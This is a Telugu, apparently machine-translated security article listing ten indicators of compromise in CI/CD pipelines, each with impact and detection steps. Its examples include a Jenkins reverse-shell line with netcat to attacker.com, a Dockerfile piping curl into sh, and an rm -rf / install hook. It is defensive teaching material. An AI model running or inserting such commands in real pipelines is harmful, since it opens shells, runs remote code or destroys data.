పరిచయం: సైబర్ సెక్యూరిటీలో రాజీ సూచికలు ఏమిటి?
రాజీ సూచికలు అనేవి మీ సిస్టమ్ లేదా pipeline దాడికి గురవుతూ ఉండవచ్చు. సరళంగా చెప్పాలంటే, రాజీ సూచికలు దాడి చేసినవారు వదిలిపెట్టిన ఆనవాళ్లు, వింతగా loginలు, ఫైల్ మార్పులు, లేదా దాగి ఉన్న మాల్వేర్. లో ఐఓసి సైబర్ సెక్యూరిటీఅవి నేరస్థలంలో వేలిముద్రల వలె పనిచేస్తాయి, ఏదో తప్పు జరిగిందని మీకు స్పష్టమైన సాక్ష్యాన్ని అందిస్తాయి. అందువల్ల, డెవలపర్లు అడిగినప్పుడు రాజీకి సూచికలు ఏమిటి?సమాధానం సర్వర్లు లేదా ఫైర్వాల్లకు మాత్రమే పరిమితం కాదు, ఆధునిక సాంకేతికతలో దాగి ఉన్న ప్రమాదాలను కూడా ఇది కలిగి ఉంటుంది. CI/CD pipelines.
వీటిలో pipelineదాడి చేసేవారు ఎవరికీ తెలియకుండా కోడ్ను తారుమారు చేయవచ్చు, హానికరమైన డిపెండెన్సీలను చొప్పించవచ్చు లేదా బిల్డ్ స్టెప్స్ను మార్చవచ్చు. అయినప్పటికీ, చాలా మార్గదర్శకాలు ఇప్పటికీ కేవలం సర్వర్లు లేదా నెట్వర్క్లపై మాత్రమే దృష్టి సారిస్తున్నాయి. ఫలితంగా, సాఫ్ట్వేర్ సప్లై చైన్ అత్యంత సులభమైన లక్ష్యాలలో ఒకటిగా మారింది.
అందుకే రాజీ సూచికలను కనుగొనడం CI/CD pipelineఇది చాలా అవసరం. అన్నింటికంటే ముఖ్యంగా, ఇది మాల్వేర్ను నిరోధించడానికి, రహస్యాలను కాపాడటానికి మరియు సాఫ్ట్వేర్ డెలివరీలోని ప్రతి దశను సురక్షితంగా ఉంచడానికి బృందాలకు సహాయపడుతుంది.
రాజీకి సంబంధించిన టాప్ 10 సూచికలు CI/CD Pipelines
రాజీ సూచికలను వివరించేటప్పుడు, చాలా జాబితాలు సర్వర్లు లేదా నెట్వర్క్లపై దృష్టి పెడతాయి. అయినప్పటికీ CI/CD pipelineదాడి చేసేవారు చాలా విభిన్నమైన గుర్తులను వదిలి వెళ్తారు. చురుకైన రక్షణ కోసం ఈ సంకేతాలను గుర్తించడం చాలా కీలకం. ప్రతి డెవలపర్ మరియు సెక్యూరిటీ ఇంజనీర్ గమనించవలసిన 10 IOC సైబర్సెక్యూరిటీ ప్రమాద సంకేతాలు కింద ఇవ్వబడ్డాయి.
1. అనుమానాస్పద ఆధారపడటం మార్పులు
రాజీకి ప్రధాన సూచికలలో ఒకటి pipelineఇది ఒక ఆకస్మిక, విచిత్రమైన డిపెండెన్సీ అప్డేట్. దాడి చేసేవారు తరచుగా, ప్రమాదకరమైన ప్యాకేజీలను జోడించడానికి, ప్యాకేజీ మేనేజర్లపై డెవలపర్లు ఉంచే నమ్మకాన్ని ఉపయోగించుకుంటారు.
ఉదాహరణకు, npm లో package.json తేడాలో అకస్మాత్తుగా ఇవి ఉండవచ్చు:
ఇలాంటి మార్పులు సురక్షితంగా కనిపించినప్పటికీ, ప్రతి బిల్డ్లోకి ట్రోజనైజ్డ్ కోడ్ను చొప్పించగలవు.
ఇంపాక్ట్: రాజీపడిన బిల్డ్లు మూలం నుండే మాల్వేర్ను పొందుతాయి.
డిటెక్షన్: డిపెండెన్సీ సమీక్షలను అమలు చేయండి, లాక్ఫైల్ వ్యత్యాసాలను ట్రాక్ చేయండి మరియు కొత్త ప్యాకేజీలను నిరంతరం స్కాన్ చేయండి.
2. బిల్డ్లలో అస్పష్టమైన కోడ్
మాల్వేర్ రూపకర్తలు సమీక్షలను తప్పించుకోవడానికి అస్పష్టతపై ఆధారపడతారు. ఫలితంగా, రాజీకి సంబంధించిన ఈ సూచిక CI/CD pipelineవీటిని పట్టుకోవడం చాలా కష్టం. నిజానికి, అస్పష్టంగా మార్చబడిన పేలోడ్లు తరచుగా ఎవరికీ తెలియకుండానే ఓపెన్ సోర్స్ లైబ్రరీలలోకి లేదా కంటైనర్ ఇమేజ్లలోకి చేరిపోతాయి.
ఉదాహరణకి:
- PyPI ప్యాకేజీని ఉపయోగించి
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - అనవసరమైన UPX బైనరీలతో ప్యాక్ చేయబడిన డాకర్ ఇమేజ్.
- జావాస్క్రిప్ట్ నిండి ఉంది
\x41\x42గుర్తింపు దొంగల నుండి తప్పించుకుంటూ దాక్కుంటుంది.
ఇంపాక్ట్: దాగి ఉన్న కోడ్ బిల్డ్ లేదా రన్టైమ్ సమయంలో నిశ్శబ్దంగా అమలు అవుతుంది, అందువల్ల ఇది IOC సైబర్సెక్యూరిటీలో ఒక కీలకమైన సంకేతం.
డిటెక్షన్: మిళితం SAST ఎన్కోడ్ చేయబడిన లేదా ప్యాక్ చేయబడిన కోడ్ను గుర్తించడానికి మాల్వేర్ స్కానింగ్ను ఉపయోగించాలి. అన్నింటికంటే ముఖ్యంగా, అస్పష్టతను మరింత దర్యాప్తు చేయాల్సిన ఒక హెచ్చరిక సంకేతంగా పరిగణించాలి.
3. గిట్లో బహిర్గతమైన రహస్యాలు: ఒక క్లాసిక్ IOC సైబర్సెక్యూరిటీ రిస్క్
CI/CD pipelineలు తరచుగా రిపోజిటరీల నుండి నేరుగా రహస్యాలను వారసత్వంగా పొందుతాయి. అయితే, గిట్లో రహస్యాలు కనిపించినప్పుడు, “ компромиస్ సూచికలు ఏమిటి” అనే ప్రశ్నకు అవి స్పష్టమైన సమాధానాలలో ఒకటిగా మారతాయి pipelineఒకసారి ఆధారాలు గిట్లో చేరాక, దాడి చేసేవారు వాటిని నిరవధికంగా దుర్వినియోగం చేయగలరు.
ఉదాహరణకి:
- A
.envఫైల్ కలిగి ఉందిAWS_SECRET_KEY=. - టోకెన్లు లోపలికి నెట్టబడ్డాయి
config.json. - తొలగించిన తర్వాత కూడా సీక్రెట్లు గిట్ హిస్టరీలో కనిపిస్తూనే ఉంటాయి.
ఇంపాక్ట్: బహిర్గతమైన కీలు దాడి చేసేవారికి నేరుగా యాక్సెస్ ఇస్తాయి CI/CD pipelines, క్లౌడ్ సిస్టమ్లు, లేదా డేటాబేస్లు. అందువల్ల ఇది రాజీకి సంబంధించిన అత్యంత ప్రమాదకరమైన సూచికలలో ఒకటి.
డిటెక్షన్: ఉపయోగించండి pre-commit hooks మరియు రహస్య స్కానింగ్ కోసం CI జాబ్లను అమలు చేయండి, మరియు లీక్ అయిన కీలను వెంటనే రద్దు చేయండి. అదనంగా, బహిర్గతమయ్యే సమయాలను తగ్గించడానికి స్వయంచాలక నివారణ చర్యలను అమలు చేయండి.
4. తారుమారు చేయబడింది Pipeline కాన్ఫిగరేషన్లు: రాజీ యొక్క దాగి ఉన్న సూచికలు
Pipeline కాన్ఫిగరేషన్లు అధిక విలువ గల లక్ష్యాలు ఎందుకంటే ఒకే ఒక్క మార్పు తరచుగా మొత్తం కార్యప్రవాహాన్ని దెబ్బతీస్తుందిఫలితంగా, తారుమారు చేయబడింది pipeline ఫైల్స్ అనేవి IOC సైబర్ సెక్యూరిటీకి ఒక ప్రధానమైన ప్రమాదం, దీనిని సాంప్రదాయ పర్యవేక్షణ సాధనాలు అరుదుగా గుర్తిస్తాయి.
ఉదాహరణకి:
గిట్హబ్ యాక్షన్లలో:
- గిట్ల్యాబ్లో: ఒక హానికరమైన జాబ్ జోడించబడింది
.gitlab-ci.ymlఅది సున్నితమైన డేటాను బయటపెడుతుంది. - జెంకిన్స్లో:
sh "nc -e /bin/bash attacker.com 4444".
ఇంపాక్ట్: ఈ ఆమోదం లేని మార్పులు మీ pipeline దాడి చేసేవారికి ఇది ఒక శాశ్వత రహస్య మార్గంగా మారుతుంది, ఇది స్పష్టంగా సిస్టమ్ రాజీపడిందని సూచించే ఒక సూచికగా పరిగణించబడుతుంది.
డిటెక్షన్: సంతకం చేసిన కాన్ఫిగ్లను అమలు చేయండి, PR ఆమోదాలను తప్పనిసరి చేయండి మరియు అనుకోని జాబ్లను పర్యవేక్షించండి. అదనంగా, సెట్ చేయండి guardrails మార్చబడిన వర్క్ఫ్లోలను స్వయంచాలకంగా నిరోధించేవి.
5. విశేషమైన IaC డిఫాల్ట్లు
తప్పుగా కాన్ఫిగర్ చేయబడిన ఇన్ఫ్రాస్ట్రక్చర్ నిర్వచనాలు తరచుగా దాగి ఉన్న బ్యాక్డోర్లను సృష్టిస్తాయి. ఫలితంగా, ప్రివిలేజ్డ్ డిఫాల్ట్లు IaC ఇవి IOC సైబర్ సెక్యూరిటీకి ఒక సంప్రదాయ ప్రమాదం.
ఉదాహరణకి:
- పాడ్లను మంజూరు చేసే కుబెర్నెటెస్ విస్తరణ
privileged: true. - సేవలను బహిర్గతం చేసే హెల్మ్ చార్ట్లు
0.0.0.0:22.
ఇంపాక్ట్: దాడి చేసేవారు రూట్-స్థాయి యాక్సెస్ను పొందుతారు లేదా అంతర్గత సేవలను బహిరంగంగా బహిర్గతం చేస్తారు. తత్ఫలితంగా, ఈ సమస్యలు దాడికి గురయ్యే అవకాశాలను గణనీయంగా పెంచుతాయి.
డిటెక్షన్: వర్తించు IaC విలీనానికి ముందు కనీస అధికారాలను అమలు చేయడానికి స్కాన్ చేయడం. అదనంగా, ప్రతి కాన్ఫిగరేషన్ సమీక్షించబడిందని నిర్ధారించుకోండి. pipeline.
6. అసాధారణ నిర్మాణ ప్రవర్తనలు
దాడి చేసేవారు తరచుగా మారుస్తారు pipeline హానికరమైన చర్యలకు పాల్పడే ప్రవర్తన. మరో మాటలో చెప్పాలంటే, అసాధారణమైన బిల్డ్ యాక్టివిటీ అనేది రాజీకి సూచికలు ఏమిటనే ప్రశ్నకు స్పష్టమైన సమాధానాలలో ఒకటి. CI/CD pipelines.
ఉదాహరణకి:
- వింత డొమైన్లకు అవుట్బౌండ్ నెట్వర్క్ అభ్యర్థనలను పంపే నిర్మాణాలు.
- ఒక Node.js ప్రాజెక్ట్ మధ్యలో అకస్మాత్తుగా PowerShellను ప్రారంభిస్తోంది
npm install. - బిల్డ్ స్క్రిప్ట్లలో నిర్వచించబడని పెద్ద బైనరీలను డౌన్లోడ్ చేసే ఒక CI జాబ్.
ఇంపాక్ట్: రాజీపడిన బిల్డ్లు మాల్వేర్ పంపిణీ కేంద్రాలుగా పనిచేయగలవు. అన్నింటికంటే ముఖ్యంగా, అవి ప్రతి డిప్లాయ్మెంట్లో హానికరమైన పేలోడ్లను వ్యాప్తి చేస్తాయి.
డిటెక్షన్: అనుకోని ప్రాసెస్లు లేదా కనెక్షన్ల కోసం బిల్డ్ లాగ్లను పర్యవేక్షించండి. అంతేకాకుండా, సాధారణం కాని ప్రవర్తనలను గుర్తించడానికి అనామలీ డిటెక్షన్ను కాన్ఫిగర్ చేయండి.
7. IOC సైబర్సెక్యూరిటీ ప్రమాదాలుగా హానికరమైన ప్యాకేజీ స్క్రిప్ట్లు
ప్యాకేజీ మేనేజర్లు జీవితచక్రానికి మద్దతు ఇస్తారు hooks దాడి చేసేవారు దుర్వినియోగం చేసేవి. అందువల్ల, npm, PyPI, లేదా Dockerfilesలోని హానికరమైన స్క్రిప్ట్లు రాజీకి బలమైన సూచికలు.
ఉదాహరణకి:
- npm:
postinstallస్క్రిప్ట్ నడుస్తోందిrm -rf /లేదా C2 కి బీకనింగ్ చేయడం. - PyPI:
setup.pyఇన్స్టాల్ సమయంలో దాగి ఉన్న పైథాన్ కోడ్ను అమలు చేయడం. - డాకర్ ఫైల్:
RUN curl attacker.sh | sh.
ఇంపాక్ట్: ఈ దాడి, ఎలాంటి రన్టైమ్ టెస్టింగ్ జరగక ముందే, ఇన్స్టాలేషన్ సమయంలో అమలు అవుతుంది. ఫలితంగా, చాలా ఆలస్యం అయ్యేంత వరకు డెవలపర్లు దీన్ని గమనించకపోవచ్చు.
డిటెక్షన్: ఇన్స్టాల్ స్క్రిప్ట్ల కోసం ప్యాకేజీ మానిఫెస్ట్లను స్కాన్ చేయండి. అదనంగా, ప్రమాదకరమైన వాటిని నిరోధించండి hooks in CI/CD బహిర్గతం కాకుండా తగ్గించుకోవడానికి ఉద్యోగాలు.
8. రిజిస్ట్రీ పాయిజనింగ్ ఇండికేటర్స్ ఆఫ్ కాంప్రమైజ్
దాడి చేసేవారు రిజిస్ట్రీలలోని ఆర్టిఫ్యాక్ట్లను భర్తీ చేస్తారు లేదా సవరిస్తారు, మరియు ఈ సంఘటనలు సప్లై చైన్లో రాజీకి సూచికలుగా ఉండే వాటికి పాఠ్యపుస్తక ఉదాహరణలు. pipelines.
ఉదాహరణకి:
- ట్రోజనైజ్డ్ లేయర్తో డాకర్ ఇమేజ్ ట్యాగ్ నిశ్శబ్దంగా అప్డేట్ చేయబడింది.
- అంతర్గత ప్యాకేజీ స్థానంలో హానికరమైన వెర్షన్ను ఉంచారు.
- npm నేమ్స్పేస్ స్క్వాటింగ్, ఉదాహరణకు
lodash-proxy.
ఇంపాక్ట్: రిజిస్ట్రీ ఆర్టిఫ్యాక్ట్ను ఉపయోగించే ప్రతి బిల్డ్ రాజీపడుతుంది. అంతేకాదు, ఆ రాజీ డౌన్స్ట్రీమ్ సేవలకు కూడా వ్యాపిస్తుంది.
డిటెక్షన్: అన్ని రిజిస్ట్రీ పుల్స్పై సిగ్నేచర్ మరియు ఇంటిగ్రిటీ తనిఖీలను అమలు చేయండి. అదనంగా, ఆర్టిఫ్యాక్ట్ ఆరిజిన్ను దీనితో ట్రాక్ చేయండి SBOM ధ్రువీకరణ.
9. IOC సాక్ష్యంగా అసాధారణ వినియోగదారు కార్యకలాపం
హ్యాక్ చేయబడిన ఖాతాలు దాదాపు ఎల్లప్పుడూ అసాధారణమైన ఆనవాళ్లను వదిలివేస్తాయి. అందువల్ల, డెవలపర్ యొక్క అసాధారణ ప్రవర్తన రాజీకి బలమైన సూచిక.
ఉదాహరణకి:
- Commitస్థానిక కాలమానం ప్రకారం తెల్లవారుజామున 3 గంటలకు పంపబడింది.
- సెలవులో ఉన్న ఖాతాల ద్వారా PR ఆమోదాలు.
- Pipelines అసాధారణ తరచుదనంతో ప్రేరేపించబడింది.
ఇంపాక్ట్: దాడి చేసేవారు దొంగిలించిన ఆధారాలను దుర్వినియోగం చేసి హానికరమైన మార్పులను చొప్పిస్తారు. ఏది ఏమైనప్పటికీ, అనధికారిక commitఇవి సాధారణ పని విధానాలలో సులభంగా కలిసిపోతాయి.
డిటెక్షన్: మానిటర్ SCM అసాధారణతల కోసం కార్యకలాపాలను తనిఖీ చేయండి, MFAను అమలు చేయండి మరియు టోకెన్లను క్రమం తప్పకుండా మార్చండి. అదనంగా, అనుమానాస్పద విషయాలపై హెచ్చరించండి. commit లేదా ఆమోద నమూనాలు.
10. IOC సైబర్సెక్యూరిటీలో సమగ్రత లేదా సంతకం తనిఖీలు విఫలమవడం
సాధారణమైనది కానీ విస్మరించబడినది రాజీ సూచిక ఇది విఫలమైన సమగ్రత లేదా సంతకం తనిఖీ. IOC సైబర్సెక్యూరిటీలో, ఈ తనిఖీలు కోడ్ లేదా ఆర్టిఫ్యాక్ట్లు ప్రామాణికమైనవని ధృవీకరిస్తాయి. వాటిని దాటవేయడం వలన... pipelineబహిర్గతమయ్యారు.
ఉదాహరణలు:
- ఆశించిన చెక్సమ్తో సరిపోలని SHA256 హ్యాష్.
- GPG సంతకం లోపించడం లేదా చెల్లనిదిగా ఉండటం.
- An SBOM సంతకం లేని కళాఖండాలను చూపుతోంది.
ఇంపాక్ట్: సమగ్రత వైఫల్యాలు తరచుగా ట్యాంపరింగ్, రిజిస్ట్రీ పాయిజనింగ్ లేదా మాల్వేర్ ఇంజెక్షన్ను సూచిస్తాయి.
డిటెక్షన్: సంతకాల తనిఖీలను స్వయంచాలకం చేయండి, చెక్సమ్ ధ్రువీకరణను అమలు చేయండి మరియు సంతకం లేని భాగాలను నిరోధించండి. అన్నింటికంటే ముఖ్యంగా, విఫలమైన ప్రతి తనిఖీని రాజీకి స్పష్టమైన సాక్ష్యంగా పరిగణించండి.
CI/CD రాజీ సూచికలు ఒక చూపులో
| రాజీ సూచిక (IOC) | ప్రభావం CI/CD Pipelines | ఎలా గుర్తించాలి |
|---|---|---|
| అనుమానాస్పద ఆధారపడటం మార్పులు | దాడి చేసేవారు ప్యాకేజీ మేనేజర్లలో హానికరమైన లైబ్రరీలను చొప్పించి, బిల్డ్లను దెబ్బతీస్తారు. | లాక్ఫైల్ వ్యత్యాసాలను ట్రాక్ చేయండి, డిపెండెన్సీ సమీక్షలను అమలు చేయండి మరియు డిపెండెన్సీలను నిరంతరం స్కాన్ చేయండి. |
| బిల్డ్లలో అస్పష్టమైన కోడ్ | దాగివున్న పేలోడ్లు బిల్డ్ల సమయంలో లేదా రన్టైమ్లో గుర్తించబడకుండానే అమలు అవుతాయి. | ఉపయోగించండి SAST మరియు బేస్64, హెక్స్, లేదా ప్యాక్డ్ కోడ్ నమూనాలను గుర్తించడానికి మాల్వేర్ స్కానింగ్. |
| గిట్లో బహిర్గతమైన రహస్యాలు | లీక్ అయిన టోకెన్లు లేదా ఏపీఐ కీలు దాడి చేసేవారికి కీలకమైన సిస్టమ్లలోకి నేరుగా ప్రవేశాన్ని కల్పిస్తాయి. | Gitలో రహస్య స్కాన్లను అమలు చేయండి hooks మరియు లీక్ అయిన ఆధారాలను స్వయంచాలకంగా రద్దు చేయండి. |
| తారుమారు చేయబడింది Pipeline కాన్ఫిగరేషన్లు | సవరించిన వర్క్ఫ్లోలు డేటా బహిష్కరణ లేదా నిల్వను లోపల అనుమతిస్తాయి CI/CD. | PR ఆమోదాలను కోరండి, సంతకం చేసిన కాన్ఫిగ్లను అమలు చేయండి మరియు పర్యవేక్షించండి pipeline మార్పులు. |
| ప్రివిలేజ్డ్ IaC డిఫాల్ట్లు | అతిగా అనుమతించే పాత్రలు లేదా అసురక్షిత డిఫాల్ట్లు క్లౌడ్ పరిసరాలను బహిర్గతం చేస్తాయి. | కనీస అధికారాల అమలు కోసం టెర్రాఫార్మ్, కుబెర్నెటెస్ మరియు హెల్మ్ ఫైళ్ళను స్కాన్ చేయండి. |
| అసాధారణ నిర్మాణ ప్రవర్తనలు | Pipelineమాల్వేర్ పంపిణీ కేంద్రాలుగా లేదా పార్శ్వ కదలిక కోసం ఉపయోగించబడతాయి. | అనుకోని డౌన్లోడ్లు, ప్రాసెస్లు లేదా అవుట్బౌండ్ కాల్ల కోసం బిల్డ్ లాగ్లను విశ్లేషించండి. |
| హానికరమైన ప్యాకేజీ స్క్రిప్ట్లు | దాగివున్న ప్రీ/పోస్ట్-ఇన్స్టాల్ స్క్రిప్ట్లు రన్టైమ్ టెస్టింగ్కు ముందు పేలోడ్లను ప్రేరేపిస్తాయి. | ప్రమాదకరమైన npm/PyPI స్క్రిప్ట్లను నిరోధించండి మరియు వాటి అమలును పరిమితం చేయండి CI/CD ఉద్యోగాలు. |
| రిజిస్ట్రీ పాయిజనింగ్ | ట్రోజనైజ్డ్ ఆర్టిఫ్యాక్ట్లు రిజిస్ట్రీలలోని విశ్వసనీయ ఇమేజ్లు లేదా బైనరీల స్థానాన్ని భర్తీ చేస్తాయి. | చెక్సమ్లను ధృవీకరించండి, సంతకం ధ్రువీకరణను అమలు చేయండి మరియు రిజిస్ట్రీలను చురుకుగా స్కాన్ చేయండి. |
| అసాధారణ వినియోగదారు కార్యాచరణ | హ్యాక్ చేయబడిన ఖాతాలు హానికరమైన సందేశాలను పంపుతాయి. commitలు లేదా ట్రిగ్గర్ pipelines. | MFAను అమలు చేయండి, పర్యవేక్షించండి commitఅసాధారణతల కోసం, మరియు విశ్లేషించండి login నమూనాలను. |
| సమగ్రత లేదా సంతకం తనిఖీలు విఫలమయ్యాయి | ట్యాంపర్ చేయబడిన కోడ్, డిపెండెన్సీలు లేదా ఇమేజ్లు ప్రవేశిస్తున్నాయని సూచిస్తుంది pipeline. | సమగ్రత తనిఖీలను స్వయంచాలకం చేయండి మరియు సంతకం లేని లేదా సరిపోలని భాగాలను నిరోధించండి. |
సాంప్రదాయ IOC సైబర్సెక్యూరిటీ ఎందుకు విఫలమవుతుంది CI/CD ప్రమాదాలు
చాలా సంస్థలు ఇప్పటికే సర్వర్లు, కంప్యూటర్లు లేదా నెట్వర్క్లపై రాజీ సూచికలను పర్యవేక్షిస్తున్నాయి. అయితే, IOC సైబర్సెక్యూరిటీకి సంబంధించిన ఈ సాంప్రదాయ విధానం విస్మరిస్తుంది CI/CD pipelines, ఇవి ఇప్పుడు అత్యంత కీలకమైన దాడి ఉపరితలాలలో ఒకటిగా ఉన్నాయి. నిజానికి, pipelineసాంప్రదాయ సాధనాలు గుర్తించలేని ప్రత్యేకమైన రాజీ సంకేతాలను ఇవి చూపుతాయి.
సాంప్రదాయ భద్రతలో రాజీ సూచికలు
సాంప్రదాయ IOC సైబర్సెక్యూరిటీలో, సాధారణంగా వీటిపై దృష్టి కేంద్రీకరిస్తారు:
- అసాధారణ loginదొంగిలించబడిన ఆధారాలను సూచించే s లేదా IP చిరునామాలు.
- మాల్వేర్ను బహిర్గతం చేసే అనుమానాస్పద ఫైల్ హ్యాష్లు లేదా రిజిస్ట్రీ మార్పులు.
- డేటా బహిర్గతంను సూచించే అనూహ్యమైన బయటి ట్రాఫిక్.
ఇవి బాగా తెలిసిన సూచికలు, వీటిని కూడా ట్రాక్ చేస్తారు MITRE ATT&CK ఫ్రేమ్వర్క్ఇది సాధారణ విరోధి ప్రవర్తనలు మరియు వ్యూహాలను మ్యాప్ చేస్తుంది. ఇవి ఉపయోగకరమైన సంకేతాలు. అయితే, అవి ప్రధానంగా ఆపరేటింగ్ సిస్టమ్లకు లేదా కార్పొరేట్ నెట్వర్క్లకు వర్తిస్తాయి. ఫలితంగా, సాఫ్ట్వేర్ సరఫరా గొలుసులో అంతకు ముందు జరిగే సూక్ష్మమైన మార్పులను అవి గుర్తించలేవు.
ఎందుకు CI/CD Pipelineలు భిన్నంగా ఉంటాయి
CI/CD pipelineలు అనేవి డెవలపర్లు పనిచేసే ఆటోమేటెడ్ వాతావరణాలు commit కోడ్, పుల్ డిపెండెన్సీలు, మరియు రిలీజ్ బిల్డ్లు. ఇక్కడ జరిగే ఒక రాజీ ప్రతి డిప్లాయ్మెంట్పై ప్రభావం చూపుతుందని దాడి చేసేవారికి తెలుసు. అందువల్ల, రాజీకి సూచికలు ఏమిటి? CI/CD pipelineఅవి చాలా భిన్నంగా కనిపిస్తున్నాయి:
- package.json లేదా requirements.txt ఫైల్కు తెలియకుండా జోడించబడిన ఒక హానికరమైన డిపెండెన్సీ.
- Gitలో బహిర్గతమైన API కీలు లేదా టోకెన్లు commit.s లేదా .env ఫైల్స్.
- npm లేదా PyPI ప్యాకేజీలలోకి అస్పష్టమైన కోడ్ చొప్పించబడింది.
- privileged: true వంటి అసురక్షిత డిఫాల్ట్లతో కూడిన Terraform లేదా Kubernetes ఫైల్లు.
- Pipeline డేటాను బయటకు తరలించడానికి లేదా బ్యాక్డోర్లను తెరవడానికి జాబ్లను సవరించడం.
ఈ రాజీ సంకేతాలు CI/CD కనిపించకుండా ఉండండి standard భద్రతా సాధనాలు.
IOC సైబర్ సెక్యూరిటీలో అంతరం
చాలా బృందాలు రాజీ సూచికల విలువను అర్థం చేసుకున్నప్పటికీ, అవి ఇప్పటికీ సర్వర్లు మరియు నెట్వర్క్ లాగ్ల నుండి గుర్తించడంపై మాత్రమే ఆధారపడతాయి. అందువల్ల, దాడి చేసేవారు సాధారణ ఆనవాళ్లను వదలకుండానే బిల్డ్లను విషపూరితం చేయగలరు లేదా మాల్వేర్ను చొప్పించగలరు. ఈ కారణంగానే XZ యుటిల్స్ బ్యాక్డోర్ లేదా హానికరమైన npm ప్యాకేజీల వంటి సంఘటనలు ప్రొడక్షన్కు చేరే వరకు గుర్తించబడలేదు.
ఈ రకమైన సరఫరా గొలుసు రాజీలను కూడా హైలైట్ చేస్తున్నారు CISA యొక్క సరఫరా గొలుసు భద్రతా మార్గదర్శకత్వందాడి చేసేవారు ఎక్కువగా లక్ష్యంగా చేసుకుంటున్నారని హెచ్చరిస్తుంది CI/CD pipelineలు మరియు రిజిస్ట్రీలు.
ది టేక్ ఎవే
సాంప్రదాయ IOC సైబర్సెక్యూరిటీ అవసరం, కానీ అది మాత్రమే సరిపోదు. అన్నింటికంటే ముఖ్యంగా, బృందాలు రాజీ సూచికలను గుర్తించాలి, ఇవి నిర్దిష్టమైనవి. CI/CD pipelineఅప్పుడే వారు హానికరమైన కోడ్ను గుర్తించగలరు లేదా pipeline దుర్వినియోగం వివిధ పరిసరాలకు వ్యాపించక ముందే.





